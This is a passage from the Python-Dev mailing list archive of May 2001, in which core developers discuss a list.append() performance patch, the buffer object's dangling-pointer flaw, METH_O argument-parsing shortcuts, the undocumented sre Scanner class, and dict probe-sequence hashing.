GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one@home.com Fri May 25 23:11:43 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 25 May 2001 18:11:43 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic In-Reply-To: <3B0ECBB0.6798F4AB@lemburg.com> Message-ID: [Tim] > Long-term we should teach PyMalloc about Python's realloc() > abuses and craft a cooperative solution. 
[MAL] > That's what I think too. There's really not much point in trying > to work around poor malloc() implementations when we've already > got the cure built into Python... The point *here* is that a simple localized patch could kill off a Frequently Irritating Complaint without further ado: on my personal cost/benefit scale, it's all I can *afford* to do now. PyMalloc likely won't solve it as-is x-platform, without new work to accommodate extreme realloc() abuse. > I just wish Vladimir would resurface again to complete his great > work I'd like him to come back even if he doesn't . > (AFAIK, pymalloc still has problems with threads). It has lock macros that haven't been #define'd to do anything yet. But part of the potential value of the Python core using its own allocator is to exploit the global interpreter lock to *not* lock in the allocator. Messy issues. Python should grow a cheaper platform-specific flavor of internal lock too. (Jeremy pointed out some code the other day that jumps through hoops to simulate a reentrant lock on top of a Python lock; an irony is that on Windows, the native lock *is* reentrant already, and Python jumps through hoops to make it act as if it weren't ) From mal@lemburg.com Fri May 25 23:07:00 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 00:07:00 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> <20010525132752.B5402@lyra.org> Message-ID: <3B0ED784.FC53D01@lemburg.com> Greg Stein wrote: > > No... what needs to happen is to have the bug in PyBufferObject fixed. Then > to refactor stringobject.c and stropmodule.c to move all of those > byte-oriented processing functions into a new file such as Python/byteops.c > (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c > would be simple covers over the same functions. 
> > Those functions can then be used by PyBufferObject to implement the rest of > the string methods on itself. > > This would leave us at MAL's suggested point: via the buffer object, we can > perform all of the standard string methods/ops on any object that implements > the buffer API. I wonder how we could achieve this without copy&pasting all the needed methods from stringobject.c to bufferobject.c.... all the string methods use the string object layout directly rather than just dealing with a pointer and a length. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From m.favas@per.dem.csiro.au Sat May 26 03:34:20 2001 From: m.favas@per.dem.csiro.au (Mark Favas) Date: Sat, 26 May 2001 10:34:20 +0800 Subject: [Python-Dev] Time for the yearly list.append() panic Message-ID: <3B0F162C.AD16E452@per.dem.csiro.au> [Tim wants to know whether his patch to listobject.c slows anything down on anyone's "oddball box"...] While in no way admitting that mine is an oddball box , it being a Tru64 Unix alpha processor machine, I do see a slowdown after applying the patch (measured on the test suite and on pystone). However, it's only of the order of 0.5 to 1%. slightly-oddly y'rs - Mark -- Mark Favas - m.favas@per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From tim.one@home.com Sat May 26 05:05:40 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 26 May 2001 00:05:40 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic In-Reply-To: <3B0F162C.AD16E452@per.dem.csiro.au> Message-ID: [Mark Favas] > [Tim wants to know whether his patch to listobject.c slows anything down > on anyone's "oddball box"...] > > While in no way admitting that mine is an oddball box , Heh -- of course not. I had more in mind obscure OSes like Linux . 
> it being a Tru64 Unix alpha processor machine, I do see a slowdown > after applying the patch (measured on the test suite and on pystone). > However, it's only of the order of 0.5 to 1%. Now that's very odd, since Alpha has about the slowest integer division on Earth, and every list append was doing an int div before the patch but not after. I'm afraid that timing the test suite before and after is a red herring, as several of the expensive tests have (pseudo)random components and can do an amount of work that varies depending on system time at the time random.py is first imported. pystone is even odder: the relevant code in listobject.c is never executed during pystone! I suspected that because pystone is an old synthetic Ada benchmark simulating a pile of integer systems programs, so pystone is unique among Python programs in not exercising any of Python's useful features -- a breakpoint in the debugger just now confirmed it (never did a list resize after compilation finished). So I'm pretty sure that after I check it in, you'll see a speedup instead . Get anywhere identifying why your other app is 20% slower (blast from the past)? From martin@loewis.home.cs.tu-berlin.de Sat May 26 06:28:32 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 26 May 2001 07:28:32 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0ED0C7.F1A665EA@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> Message-ID: <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> > I was thinking of using pointer indirection for this: > > foo(PyObject *self, int *i) > > If i is given as argument, *i is set to the value, otherwise > i is set to NULL. That is a good idea; I'll try to update my patch to more calling conventions.
Regards, Martin From tim.one@home.com Sat May 26 07:44:04 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 26 May 2001 02:44:04 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0ED784.FC53D01@lemburg.com> Message-ID: The buffer object has been neglected for years: is that because it's in prime shape, or because nobody cares about it enough to maintain it? "The bug" has been known for years without any action taken to address it; the docs give up in spots and nobody addresses that either (like "The current policy seems to state that these characters may be multi-byte characters" -- well, yes or no?); the builtin buffer() function isn't called anywhere in the std test suite; the file object still has an undocumented readinto() method that just confuses people who bump into it; and it's so obscure in daily life that it appears Guido didn't even think of it when adding iterators for the other sequence types. I expect that answers my question . Is someone (Greg? MAL?) going to champion it now? That would be cool. About combining strop and buffers and strings, don't forget unicodeobject.c: that's got oodles of basically duplicate code too. /F suggested dealing with the minor differences via maintaining one code file that gets compiled multiple times w/ appropriate #defines. From tim.one@home.com Sat May 26 09:14:06 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 26 May 2001 04:14:06 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: I don't want to see us duplicate the guts of PyArg_ParseTuple() inside do_call_special(). METH_O is a cool idea, METH_l is marginal, and the new code is already slower for METH_O than it needs to be in order to support the *possibility* of METH_l too (stacks and loops and switch stmts and an extra layer of do_call_special function call "just in case"). Do METH_O, convert every "O" function to use it, declare victory, and enjoy the weekend . 
1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-size-ly y'rs - tim From m.favas@per.dem.csiro.au Sat May 26 09:30:29 2001 From: m.favas@per.dem.csiro.au (Mark Favas) Date: Sat, 26 May 2001 16:30:29 +0800 Subject: [Python-Dev] Time for the yearly list.append() panic References: Message-ID: <3B0F69A5.6F569573@per.dem.csiro.au> [Tim tells Mark that his observations reflect more Brownian motion (pseudo!) than reality...] > [Mark Favas] > > it being a Tru64 Unix alpha processor machine, I do see a slowdown > > after applying the patch (measured on the test suite and on pystone). > > However, it's only of the order of 0.5 to 1%. > > Now that's very odd, since Alpha has about the slowest integer division on > Earth, and every list append was doing an int div before the patch but not > after. > > I'm afraid that timing the test suite before and after is a red herring, as > several of the expensive tests have (pseudo)random components and can do an > amount of work that varies depending on system time at the time random.py is > first imported. > > pystone is even odder: the relevant code in listobject.c is never executed > during pystone! I suspected that because pystone is an old synthetic Ada > benchmark simulating a pile of integer systems programs, so pystone is > unique among Python programs in not exercising any of Python's useful > features -- a breakpoint in the debugger just now confirmed it (never > did a list resize after compilation finished). > > So I'm pretty sure that after I check it in, you'll see a speedup instead > . OK : this time, instead of making unwarranted assumptions about test suites and pystones , I wrote and ran a test that I _think_ should exercise the code (at least, it does lots of list.append()s), and, yes, the newly checked-in code's about 3-4% faster compared with the original version of, well, days ago. > > Get anywhere identifying why your other app is 20% slower (blast from the > past)? No, not yet.
The profiling results at first eyeball seemed hard to match up, so I put it off for a rainy weekend. And Perth's drought has just broken... Will attempt to make sense of it. Interesting that Marc Andre seemed to get a somewhat similar slowdown between 1.5.2 and 2.0. -- Mark Favas - m.favas@per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From mal@lemburg.com Sat May 26 10:54:12 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 11:54:12 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> Message-ID: <3B0F7D44.1A12CE0F@lemburg.com> "Martin v. Loewis" wrote: > > > I was thinking of using pointer indirection for this: > > > > foo(PyObject *self, int *i) > > > > If i is given as argument, *i is set to the value, otherwise > > i is set to NULL. > > That is a good idea; I'll try to update my patch to more calling > conventions. This morning another idea popped up which could help us with handling generic calling schemes: How about making *all* parameters pointers ?! The calling mechanism would then just have to deal with a changing number of parameters and not with different types (this is how PyArg_ParseTuple() works too if I remember correctly). We could easily provide calling schemes for 1 - n arguments that way and the types of these arguments would be defined by the parser string just like before. Examples: foo(PyObject *self, PyObject *obj, int *i) bar(PyObject *self, int *i, int *j, char *txt, int *len) To call these, the calling mechanism would have to cast these to: foo(void *, void *, void *) bar(void *, void *, void *, void *, void *) Wouldn't this work ?
-- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From paulp@ActiveState.com Sat May 26 16:02:08 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Sat, 26 May 2001 08:02:08 -0700 Subject: [Python-Dev] Scanner Message-ID: <3B0FC570.17707787@ActiveState.com> What ever happened to the sre Scanner? It seemed like a good idea but it was not documented and it doesn't work for me. Is it just a case of nobody got around to the documentation or have we decided against it? Here's the code that doesn't work for me: from sre import Scanner scanner = Scanner([ (r"[a-zA-Z_]\w*", None), (r"\d+\.\d*", None), (r"\d+", None), (r"=|\+|-|\*|/", None), (r"\s+", None), ]) tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") Traceback (most recent call last): File "junk.py", line 11, in ? tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") File "c:\program files\python21\lib\sre.py", line 254, in scan action = self.lexicon[m.lastindex][1] TypeError: sequence index must be integer m.lastindex is None -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From mal@lemburg.com Sat May 26 16:47:47 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 17:47:47 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B0FD023.C4588919@lemburg.com> Tim Peters wrote: > > The buffer object has been neglected for years: is that because it's in > prime shape, or because nobody cares about it enough to maintain it? 
"The > bug" has been known for years without any action taken to address it; the > docs give up in spots and nobody addresses that either (like "The current > policy seems to state that these characters may be multi-byte characters" -- > well, yes or no?); the builtin buffer() function isn't called anywhere in > the std test suite; the file object still has an undocumented readinto() > method that just confuses people who bump into it; and it's so obscure in > daily life that it appears Guido didn't even think of it when adding > iterators for the other sequence types. > > I expect that answers my question . Is someone (Greg? MAL?) going to > champion it now? That would be cool. I believe that nobody really likes the buffer interface enough to let the world know about it, except maybe Greg ;-) Even the idea of replacing the usage of strings as data buffers with buffer object didn't get very far; common habits are simply hard to break. > About combining strop and buffers and strings, don't forget unicodeobject.c: > that's got oodles of basically duplicate code too. /F suggested dealing > with the minor differences via maintaining one code file that gets compiled > multiple times w/ appropriate #defines. Hmm, that only saves us a few kB in source, but certainly not in the object files. The better idea would be making the types subclass from a generic abstract string object -- I just don't know how this will be possible with Guido's type patches. We'll just have to wait, I guess. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one@home.com Sat May 26 22:15:11 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 26 May 2001 17:15:11 -0400 Subject: [Python-Dev] Scanner In-Reply-To: <3B0FC570.17707787@ActiveState.com> Message-ID: [Paul Prescod] > What ever happened to the sre Scanner? 
It seemed like a good idea > but it was not documented I previously urged /F to document, and Python-Dev to accept, the .lastindex and .lastgroup match object extensions, but to date got no response. Whether to adopt the Scanner class too is fuzzier, since AFAICT almost nobody has figured out how to use it. > and it doesn't work for me. This isn't a code problem, it's a failure to reverse-engineer the undocumented API . > Is it just a case of nobody got around to the documentation or have > we decided against it? WRT Scanner, partly the former, nothing of the latter, mostly that there's been no discussion of the API at all. WRT lastindex and lastgroup, I think purely the former. > Here's the code that doesn't work for me: > > from sre import Scanner > > scanner = Scanner([ > (r"[a-zA-Z_]\w*", None), > (r"\d+\.\d*", None), > (r"\d+", None), > (r"=|\+|-|\*|/", None), > (r"\s+", None), > ]) 1. Every tokenization regexp must contain exactly one capturing group. The lack above is the source of your later TypeError. Unclear to me whether that was the intent, or just the way the code happens to work today. 2. When an action is None, the substring matched by the pattern will be thrown away. You need to supply non-None actions if you want anything to show up in the token list. > tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") > > Traceback (most recent call last): > File "junk.py", line 11, in ?
> tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") > File "c:\program files\python21\lib\sre.py", line 254, in scan > action = self.lexicon[m.lastindex][1] > TypeError: sequence index must be integer > > m.lastindex is None Here's a working rewrite: from sre import Scanner def retrieve(scanner, group): return group scanner = Scanner([ (r"([a-zA-Z_]\w*)", retrieve), (r"(\d+\.\d*)", retrieve), (r"(\d+)", retrieve), (r"(=|\+|-|\*|/)", retrieve), (r"(\s+)", None), # ignore whitespace ]) tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") print tokens, `tail` That prints ['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] '' In return for that, how about *you* supply a works-on-Windows rewrite of test_urllib2.py? You know more about that than anyone, and the test has been failing for weeks. From MarkH@ActiveState.com Sun May 27 03:39:43 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Sun, 27 May 2001 12:39:43 +1000 Subject: [Python-Dev] strop vs. string In-Reply-To: Message-ID: [Tim] > The buffer object has been neglected for years: is that because it's in > prime shape, or because nobody cares about it enough to maintain it? My take is a little different. I think people could be convinced to care about it, and indeed I do. However, it has one fatal flaw, and no one seems to know what to do about it. The problem is the one best demonstrated with the array module - if you get a pointer to the buffer interface for an array object, but the array then resizes itself, the buffer pointer dangles. There have been a few attempts over time to raise the buffer profile, but this design flaw leaves people scratching their head - it is hard to press for adoption of a feature that has a known crash hiding away. However, addressing this problem is difficult. Guido appears unconvinced that buffer objects and interfaces are that worthwhile. It appears no one else knows how to proceed in the face of this ambivalence - that describes my take even if no one else's.
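Outside this 2001 thread, but a useful comparison: the revised buffer protocol in Python 3 (PEP 3118) counts outstanding exports, and `array.array` refuses to resize while a `memoryview` of it is alive, which closes the dangling-pointer hole Mark describes for the array module. A small sketch (the function name is illustrative only):

```python
import array


def resize_while_exported():
    """Show that an exported array cannot be resized until its view is released."""
    data = array.array("b", [1, 2, 3])
    view = memoryview(data)          # export the underlying buffer
    try:
        data.append(4)               # would reallocate and leave `view` dangling
        resized = True
    except BufferError:
        resized = False              # refused while the export is outstanding
    view.release()                   # drop the export
    data.append(4)                   # resizing is allowed again
    return resized, data.tolist()


print(resize_while_exported())
```

In-place writes through the view remain allowed; only operations that would move the memory are refused while the export exists.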
The-buffer-is-dead,-long-live-the-buffer-ly, Mark. From tim.one@home.com Sun May 27 07:34:53 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 27 May 2001 02:34:53 -0400 Subject: [Python-Dev] Next dict crusade Message-ID: I'm still trying to work off the backlog of ignored dict ideas. Way back here: http://mail.python.org/pipermail/python-dev/2000-December/011085.html Christian Tismer suggested using polynomial division instead of multiplication for generating the probe sequence, as a way to get all the bits of the hash code into play. The desirability of doing that is illustrated by, e.g., this program: def f(keys): from time import clock d = {} s = clock() for k in keys: d[k] = k f = clock() print "build time %.3f" % (f-s) s = clock() for k in keys: assert d.has_key(k) f = clock() print "search time %.3f" % (f-s) # Excellent performance. keys = range(20000) for i in range(5): f(keys) # Terrible performance; > 500x slower. keys = [i << 16 for i in range(20000)] for i in range(5): f(keys) Christian had a very clever (cheap and effective) solution: Old algorithm (multiplication): shift the index left by 1 if index > mask: xor the index with the generator polynomial New algorithm (division): if low bit of index set: xor the index with the generator polynomial shift the index right by 1 where "index" should really read "increment", and unlike today we do not mask off any of the bits of the initial increment (and that's what lets *all* the bits of the hash code come into play; there's no point to doing this otherwise). I've since discovered that it's got a fatal rare flaw: the new algorithm can generate a 0 increment, while the old algorithm cannot. Example: poly is 131 and hash is 145.
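The two increment-update rules in Tim's note, and the zero fixed point reached with poly 131 and hash 145, can be checked with a small Python model. This is a sketch, not dictobject.c: the function names are ours, and pairing poly 131 with a 128-slot table (mask 127) is an assumption made for the old rule.

```python
def initial_incr(h):
    """Unmasked initial increment, computed as in Tim's example."""
    return h ^ (h >> 3)


def next_incr_old(incr, mask, poly):
    """Old rule (multiplication): shift left, then reduce if it overflows the mask."""
    incr <<= 1
    if incr > mask:
        incr ^= poly
    return incr


def next_incr_new(incr, poly):
    """New rule (division): reduce if the low bit is set, then shift right."""
    if incr & 1:
        incr ^= poly
    return incr >> 1


POLY, MASK = 131, 127           # example polynomial; assumed 128-slot table

incr = initial_incr(145)        # 145 ^ 18 == 131, i.e. equal to POLY
stuck = next_incr_new(incr, POLY)
print(incr, stuck)              # the new rule reaches 0, and 0 maps to 0
```

Under the old rule a nonzero masked increment stays nonzero: after the left shift the value is even, so XOR with the odd polynomial can never give 0.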
Because we don't mask off any bits in computing the initial increment, the initial increment is computed as incr = hash ^ (hash >> 3) == 145 ^ (145 >> 3) == 145 ^ 18 == 131 == poly So if we don't hit on the first probe, the new if low bit of index set: xor the index with the generator polynomial shift the index right by 1 business sets incr to 0, and the result is an infinite loop (0 is a fixed point). I hate to add another branch to this. As is, the existing branch in both the old and new ways is of the worst possible kind: it's taken half the time, with a pseudo-random distribution. So there's not a branch-prediction gimmick on earth it won't fool. Note that there's no reasonable way to identify "bad values" for incr before the loop starts, either -- there's really no way to tell whether incr mod poly is 0 without a loop to do division steps until incr < poly (if incr < poly and incr != 0, incr can never become 0, so there's no more need to test after reaching that point). Such a "pre loop" would cost more than the existing loop in most cases, as we usually get out of the existing loop today on its first iteration. But in that case, what am I worried about ? time-for-a-checkin-ly y'rs - tim From martin@loewis.home.cs.tu-berlin.de Sun May 27 10:01:14 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 27 May 2001 11:01:14 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0F7D44.1A12CE0F@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> Message-ID: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> > To call these, the calling mechanism would have to cast these > to: > > foo(void *, void *, void *) > bar(void *, void *, void *, void *, void *) > > Wouldn't this work ? 
I think it would work, but I doubt it would save much compared to the existing approach. The main point of this patch is to improve efficiency, and (according to Jeremy's analysis), most of the time for calling a function is spent in PyArg_ParseTuple. So if we replace it with another interface that also relies on parsing a string, I doubt we'll improve efficiency. IOW, I won't implement that approach. If you do, I'd be curious to hear the results, of course. Regards, Martin P.S. There would still be cases where PyArg_ParseTuple is needed, e.g. for "O!". From mal@lemburg.com Sun May 27 11:26:27 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 27 May 2001 12:26:27 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> Message-ID: <3B10D653.4D81E280@lemburg.com> "Martin v. Loewis" wrote: > > > To call these, the calling mechanism would have to cast these > > to: > > > > foo(void *, void *, void *) > > bar(void *, void *, void *, void *, void *) > > > > Wouldn't this work ? > > I think it would work, but I doubt it would save much compared to the > existing approach. The main point of this patch is to improve > efficiency, and (according to Jeremy's analysis), most of the time for > calling a function is spent in PyArg_ParseTuple. So if we replace it > with another interface that also relies on parsing a string, I doubt > we'll improve efficiency. That's the point: we are not replacing PyArg_ParseTuple() with another parsing mechanism, we are only using PyArg_ParseTuple() as fallback solution for parser strings for which we don't provide a special case implementation.
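The fast-path-plus-fallback dispatch MAL proposes here can be modelled in Python to show the control flow. This is a sketch, not CPython code: `call_method`, `FAST_PATHS` and `generic_parse` are hypothetical names, a dictionary lookup stands in for the strcmp() checks, `generic_parse` plays the role of PyArg_ParseTuple(), and `None` stands in for the NULL pointer passed for an omitted optional argument.

```python
# Toy model of format-string dispatch; every name here is hypothetical.

def _call_O(func, self, args):
    # Like METH_O: exactly one object argument, no format parsing at all.
    if len(args) != 1:
        raise TypeError("expected 1 argument")
    return func(self, args[0])


def _call_OO(func, self, args):
    if len(args) != 2:
        raise TypeError("expected 2 arguments")
    return func(self, args[0], args[1])


# Dictionary lookup stands in for strcmp() against a few common formats.
FAST_PATHS = {"O": _call_O, "OO": _call_OO}


def generic_parse(codes, args):
    """Slow path: interpret the format on every call ('O', 'i' and '|' only)."""
    required, _, optional = codes.partition("|")
    if not len(required) <= len(args) <= len(required) + len(optional):
        raise TypeError(f"wrong number of arguments for {codes!r}")
    for code, arg in zip(required + optional, args):
        if code not in "Oi":
            raise ValueError(f"unsupported format code {code!r}")
        if code == "i" and not isinstance(arg, int):
            raise TypeError("an integer is required")
    # Omitted optional arguments become None (the C version would pass NULL).
    missing = len(required) + len(optional) - len(args)
    return list(args) + [None] * missing


def call_method(func, fmt, self, args):
    codes = fmt.partition(":")[0]        # drop the ":name" suffix
    fast = FAST_PATHS.get(codes)
    if fast is not None:
        return fast(func, self, args)    # special-cased: no string parsing
    return func(self, *generic_parse(codes, args))
```

For example, `call_method(replace, "OO|i:replace", s, ("a", "b"))` takes the slow path and calls `replace(s, "a", "b", None)`, while a method declared with `"O"` skips parsing entirely.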
The idea is to simply do a strcmp() (*) for a few common combinations (e.g. "O" and "OO") and then provide the same special case handling as you do with e.g. METH_O. The result would be almost the same w/r to performance and code reduction as with your approach. The only addition would be using strcmp() instead of a switch statement.

The advantage of this approach is that while you can still provide special case handling of common parser strings, you can also provide generic APIs for most other parser strings by falling back to PyArg_ParseTuple() for these.

> IOW, I won't implement that approach. If you do, I'd be curious to
> hear the results, of course.

I'll see what I can do...

> P.S. There would still be cases where PyArg_ParseTuple is needed,
> e.g. for "O!".

True... can't win 'em all ;-)

--
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From mal@lemburg.com Sun May 27 11:30:48 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:30:48 +0200
Subject: [Python-Dev] strop vs. string
References: 
Message-ID: <3B10D758.3741AC2F@lemburg.com>

Mark Hammond wrote:
>
> [Tim]
> > The buffer object has been neglected for years: is that because it's in
> > prime shape, or because nobody cares about it enough to maintain it?
>
> My take is a little different. I think people could be convinced to care
> about it, and indeed I do. However, it has one fatal flaw, and no one seems
> to know what to do about it.
>
> The problem is the one best demonstrated with the array module - if you get
> a pointer to the buffer interface for an array object, but the array then
> resizes itself, the buffer pointer dangles.
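Mark's dangling-pointer problem can be illustrated with a Python model. Python cannot crash here, so a stale list stands in for the dangling pointer. `ToyArray`, `CachingBuffer` and `RefetchingBuffer` are hypothetical names; the refetching variant follows the "keep a reference, re-fetch on each use" approach that comes up later in this thread.

```python
class ToyArray:
    """Stand-in for array.array: growing it allocates a new block, the way
    a C realloc() may move the data."""

    def __init__(self, items):
        self._block = list(items)

    def get_buffer(self):
        # Plays the role of the getreadbuf slot: hand out the current block.
        return self._block

    def append(self, item):
        # Copy into a fresh block; anyone holding the old one is now stale.
        self._block = self._block + [item]


class CachingBuffer:
    """Grabs the block once at creation, like the buffer object described."""

    def __init__(self, obj):
        self._obj = obj
        self._block = obj.get_buffer()

    def __len__(self):
        return len(self._block)

    def __getitem__(self, i):
        return self._block[i]


class RefetchingBuffer:
    """Keeps only the object and asks for the block on every access."""

    def __init__(self, obj):
        self._obj = obj

    def __len__(self):
        return len(self._obj.get_buffer())

    def __getitem__(self, i):
        return self._obj.get_buffer()[i]


a = ToyArray([1, 2])
cached, fresh = CachingBuffer(a), RefetchingBuffer(a)
a.append(3)
print(len(cached), len(fresh))   # 2 3
```

The refetching version stays correct, but it pays for an extra call on every element access.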
I guess there are three ways to "solve" this:

a) mutable types don't implement the getreadbuf interface

b) the getreadbuf interface is complemented with a callback
   interface, so the buffer object can be notified of
   the change

c) calling getreadbuf on a mutable object causes this object
   to become immutable

--
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From jeremy@digicool.com Sun May 27 19:51:26 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:51:26 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <15121.19630.329909.482775@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis writes:

  MvL> to the existing approach. The main point of this patch is to
  MvL> improve efficiency, and (according to Jeremy's analysis), most
  MvL> of the time for calling a function is spent in
  MvL> PyArg_ParseTuple.

I'd like to qualify this a bit. What I reported earlier is that the BuiltinFunctionCall microbenchmark in pybench spends 30% of its time in PyArg_ParseTuple(). This strikes me as excessive, because it's a static property of the code. (One could imagine writing a Python script that parsed the "O!|is#" format strings and generated efficient, specialized C code for that format.)

If we benchmark other programs, particularly those that do more work in the builtins, the relative cost of the argument processing will be lower.
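Jeremy's aside about generating specialized C from format strings could start from a tokenizer like the one below. It is a hypothetical sketch that covers only a small subset of the format language: single-letter codes, the `!`, `#` and `&` modifiers, `|` for optional arguments and a `:name` suffix. The emitted C uses the real `PyTuple_GET_SIZE`/`PyTuple_GET_ITEM` macros, but it is illustrative and has not been run through a compiler.

```python
def tokenize_format(fmt):
    """Split e.g. 'O!|is#' into (['O!', 'i', 's#'], required_count, name)."""
    body, _, name = fmt.partition(":")
    units, required = [], None
    i = 0
    while i < len(body):
        ch = body[i]
        if ch == "|":
            required = len(units)        # everything after '|' is optional
            i += 1
        elif i + 1 < len(body) and body[i + 1] in "!#&":
            units.append(body[i:i + 2])  # code plus modifier, e.g. 'O!' or 's#'
            i += 2
        else:
            units.append(ch)
            i += 1
    if required is None:
        required = len(units)
    return units, required, name


def emit_unpack(fmt):
    """Emit C that unpacks a tuple for formats made only of required 'O' codes."""
    units, required, name = tokenize_format(fmt)
    if any(u != "O" for u in units) or required != len(units):
        raise NotImplementedError("sketch only handles plain 'O' codes")
    n = len(units)
    lines = [f"if (PyTuple_GET_SIZE(args) != {n}) {{",
             f'    PyErr_SetString(PyExc_TypeError, "{name}() takes exactly {n} argument(s)");',
             "    return NULL;",
             "}"]
    lines += [f"a{k} = PyTuple_GET_ITEM(args, {k});" for k in range(n)]
    return "\n".join(lines)


print(tokenize_format("O!|is#"))   # (['O!', 'i', 's#'], 1, '')
print(emit_unpack("OO:cmp"))
```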
Jeremy

From jeremy@digicool.com Sun May 27 19:55:36 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:55:36 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: 
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <15121.19880.775931.946049@slothrop.digicool.com>

>>>>> "TP" == Tim Peters writes:

  TP> Do METH_O, convert every "O" function to use it, declare
  TP> victory, and enjoy the weekend.

  TP> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
  TP> size-ly y'rs - tim

How is METH_O different than METH_OLDARGS? The old-style argument passing is definitely the most efficient for functions of zero or one arguments. There's special-case code in ceval to support these cases -- fast_cfunction() -- primarily because in these cases the function can be invoked by using arguments directly from the Python stack instead of copying them to a tuple first.

Jeremy

From tim.one@home.com Sun May 27 21:37:43 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 16:37:43 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19880.775931.946049@slothrop.digicool.com>
Message-ID: 

[Jeremy]
> How is METH_O different than METH_OLDARGS?

I have no idea: can you explain it? The #define's for these symbols are uncommented, and it's a mystery to me what they're *supposed* to mean.

> The old-style argument passing is definitely the most efficient for
> functions of zero or one arguments. There's special-case code in
